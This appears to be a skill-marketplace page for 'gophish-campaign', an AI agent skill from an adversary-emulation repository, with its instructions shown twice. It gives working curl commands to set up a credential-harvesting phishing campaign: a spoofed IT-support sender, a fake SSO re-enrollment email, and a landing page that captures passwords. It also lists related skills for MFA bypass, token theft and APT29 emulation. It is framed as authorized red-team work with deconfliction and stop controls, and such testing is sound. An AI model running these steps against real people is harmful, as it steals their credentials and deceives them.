Run any Skill in Manus with one click

gophish-campaign

Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.

Run Skill in Manus

Stars4,323

Forks860

UpdatedJune 8, 2026 at 07:58

Source

PurpleAILAB

PurpleAILAB/Decepticon

View GitHub Repository View Creator Repositories

Install command

Download

Run Skill in Manus

SKILL.md

readonly

name	gophish-campaign
description	Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
metadata	{"subdomain":"phishing","when_to_use":"gophish, phishing campaign, email template, landing page, campaign tracking, credential harvest landing","mitre_attack":["T1566.002","T1598.003"],"tags":["phishing","gophish","campaign"]}

GoPhish Campaign

GoPhish drives the credential-harvest landing-page flow and the click/submit tracking the report needs. Use it for the "fake login page" path; use evilginx2-proxy instead when you must defeat MFA.

Prerequisites

GoPhish running in the sandbox (gophish binary; admin API on https://127.0.0.1:3333, phish server on :80/:443).
GOPHISH_API_KEY exported (read from the admin UI once).
The lure-deconfliction handshake COMPLETE for this campaign.
A sender domain with SPF/DKIM/DMARC (lookalike-domain) and a pretext (pretext-engineering).

Flow (REST API)

API=https://127.0.0.1:3333/api
H="Authorization: Bearer $GOPHISH_API_KEY"

# 1. Sending profile (SMTP)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/smtp/ -d '{
  "name":"eng-smtp","host":"smtp.lure-domain.example:587",
  "from_address":"it-support@lure-domain.example",
  "username":"...","password":"...","ignore_cert_errors":true}'

# 2. Target group (from plan/phisher/pretext.md shortlist)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/groups/ -d '{
  "name":"wave1","targets":[{"email":"alice@acme.example","first_name":"Alice","last_name":"R"}]}'

# 3. Email template (include the X-Decepticon-Eng header + opt-out URL)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/templates/ -d '{
  "name":"sso-migration","subject":"Action needed: SSO re-enrollment",
  "html":"<a href=\"{{.URL}}\">Re-enroll</a> {{.Tracker}}"}'

# 4. Landing page (capture creds, then redirect to the real site)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/pages/ -d '{
  "name":"sso-landing","html":"<form>...</form>",
  "capture_credentials":true,"redirect_url":"https://login.microsoftonline.com"}'

# 5. Launch
curl -sk -H "$H" -H 'Content-Type: application/json' $API/campaigns/ -d '{
  "name":"acme-wave1","template":{"name":"sso-migration"},
  "page":{"name":"sso-landing"},"smtp":{"name":"eng-smtp"},
  "url":"https://login.acme-portal.example","groups":[{"name":"wave1"}]}'

# 6. Poll results
curl -sk -H "$H" $API/campaigns/ | jq '.[].results[] | {email,status}'

Evidence

Each submitted credential → Credential node linked to the User node with an OBTAINED_VIA edge carrying the campaign id. Save the raw GoPhish results JSON under evidence/phisher/<campaign>.json.

OPSEC / failsafe

Send rate matches opsec_level (stealth ≤2/h, standard ≤20/h).
gophish_pause_campaign (PUT $API/campaigns/:id/complete) halts sending instantly on a SOC stop request.
Every template carries the engagement header + opt-out link.

More from this repository

same repository

evilginx2-proxy

PurpleAILAB/Decepticon

Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.

2026-06-084.3k

lookalike-domain

PurpleAILAB/Decepticon

Register and provision a lookalike / Punycode phishing domain with DNS and TLS so GoPhish and evilginx2 lures resolve and pass modern mail + browser checks.

2026-06-084.3k

o365-credential-harvest

PurpleAILAB/Decepticon

Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts.

2026-06-084.3k

pretext-engineering

PurpleAILAB/Decepticon

Design a credible phishing pretext and target shortlist from OSINT before any campaign is built — sender persona, scenario, timing, and the minimal target set.

2026-06-084.3k

phishing-overview

PurpleAILAB/Decepticon

Phishing / social-engineering catalog for the Phisher agent. Use ONLY when the engagement RoE authorizes a phishing engagement. Covers pretext design, GoPhish campaigns, evilginx2 MFA-bypass proxying, O365 credential/token harvest, lookalike domains, and the mandatory blue-team deconfliction handshake.

2026-06-084.3k

apt29

PurpleAILAB/Decepticon

APT29 (Cozy Bear / Midnight Blizzard, SVR) adversary-emulation playbook — malware-light cloud-identity espionage: no-MFA password spray, OAuth consent/token abuse, Golden SAML, mailbox collection over residential proxies. Use when emulating APT29 against an M365/Entra/AWS-identity estate. Triggers on: 'emulate APT29', 'Cozy Bear', 'Midnight Blizzard', 'NOBELIUM', 'OAuth abuse', 'cloud identity espionage', 'Golden SAML'.

2026-06-084.3k

GoPhish Campaign

GoPhish drives the credential-harvest landing-page flow and the click/submit tracking the report needs. Use it for the "fake login page" path; use evilginx2-proxy instead when you must defeat MFA.

Prerequisites

GoPhish running in the sandbox (gophish binary; admin API on https://127.0.0.1:3333, phish server on :80/:443).

GOPHISH_API_KEY exported (read from the admin UI once).

The lure-deconfliction handshake COMPLETE for this campaign.

A sender domain with SPF/DKIM/DMARC (lookalike-domain) and a pretext (pretext-engineering).

Flow (REST API)

API=https://127.0.0.1:3333/api H="Authorization: Bearer $GOPHISH_API_KEY" # 1. Sending profile (SMTP) curl -sk -H "$H" -H 'Content-Type: application/json' $API/smtp/ -d '{ "name":"eng-smtp","host":"smtp.lure-domain.example:587", "from_address":"it-support@lure-domain.example", "username":"...","password":"...","ignore_cert_errors":true}' # 2. Target group (from plan/phisher/pretext.md shortlist) curl -sk -H "$H" -H 'Content-Type: application/json' $API/groups/ -d '{ "name":"wave1","targets":[{"email":"alice@acme.example","first_name":"Alice","last_name":"R"}]}' # 3. Email template (include the X-Decepticon-Eng header + opt-out URL) curl -sk -H "$H" -H 'Content-Type: application/json' $API/templates/ -d '{ "name":"sso-migration","subject":"Action needed: SSO re-enrollment", "html":"<a href=\"{{.URL}}\">Re-enroll</a> {{.Tracker}}"}' # 4. Landing page (capture creds, then redirect to the real site) curl -sk -H "$H" -H 'Content-Type: application/json' $API/pages/ -d '{ "name":"sso-landing","html":"<form>...</form>", "capture_credentials":true,"redirect_url":"https://login.microsoftonline.com"}' # 5. Launch curl -sk -H "$H" -H 'Content-Type: application/json' $API/campaigns/ -d '{ "name":"acme-wave1","template":{"name":"sso-migration"}, "page":{"name":"sso-landing"},"smtp":{"name":"eng-smtp"}, "url":"https://login.acme-portal.example","groups":[{"name":"wave1"}]}' # 6. Poll results curl -sk -H "$H" $API/campaigns/ | jq '.[].results[] | {email,status}'

Evidence

OPSEC / failsafe

Send rate matches opsec_level (stealth ≤2/h, standard ≤20/h).

gophish_pause_campaign (PUT $API/campaigns/:id/complete) halts sending instantly on a SOC stop request.

Every template carries the engagement header + opt-out link.